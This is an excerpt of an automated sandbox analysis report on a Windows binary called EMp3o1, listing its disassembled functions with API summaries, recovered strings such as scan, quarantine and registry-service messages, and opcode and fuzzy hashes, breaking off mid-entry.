                                                Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                • String ID:
                                                • API String ID: 1995290849-0
                                                • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                                • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                                Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                • String ID:
                                                • API String ID: 1995290849-0
                                                • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                                • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                                Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                                • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                • API String ID: 93015348-1041928032
                                                • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                                • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                                Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                                • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                                • API String ID: 3682727354-300733478
                                                • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                                • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                                Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                                • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                                • API String ID: 2587151837-1427723692
                                                • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                                • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                                Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                                • String ID: SetDllDirectoryW$kernel32.dll
                                                • API String ID: 3184163350-3826188083
                                                • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                                • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                                Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcesslstrlen
                                                • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                • API String ID: 3424473247-996641649
                                                • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                                • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                                Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: String$ByteCharMultiWide$ErrorLast
                                                • String ID:
                                                • API String ID: 1775797328-0
                                                • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                                • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                                Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                                • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                                • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                                • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                                • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                                • String ID:
                                                • API String ID: 1232609184-0
                                                • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                                • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                                Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                                • String ID: H
                                                • API String ID: 2107338056-2852464175
                                                • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                                • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                                Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                                • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                                • API String ID: 1322048431-2685357988
                                                • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                                • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                                Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                                • API String ID: 2984211723-3002863673
                                                • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                                • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                                Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                                • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                                • API String ID: 678758403-4129911376
                                                • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                                • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                                Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcesslstrlen
                                                • String ID:
                                                • API String ID: 3424473247-0
                                                • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                                • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                                Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                                • String ID: bad exception$csm$csm$csm
                                                • API String ID: 3766904988-820278400
                                                • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                                • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                                Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                                • String ID:
                                                • API String ID: 2707001247-0
                                                • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                                • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                                Function 00007FFDAC084804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                • String ID: csm$csm$csm
                                                • API String ID: 849930591-393685449
                                                • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                • Instruction ID: 026c88c7e75aa276b624efd9259e2e5c79c3f99b990083c5bd97089afd20fd69
                                                • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                • Instruction Fuzzy Hash: 19D19D22A097418AEB309B75D4603AD37A4FB457E8F108135EA8D57B96DF38E0A1D70C
                                                Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                                • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                                Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                                • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                                Function 00007FFDAC08B86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
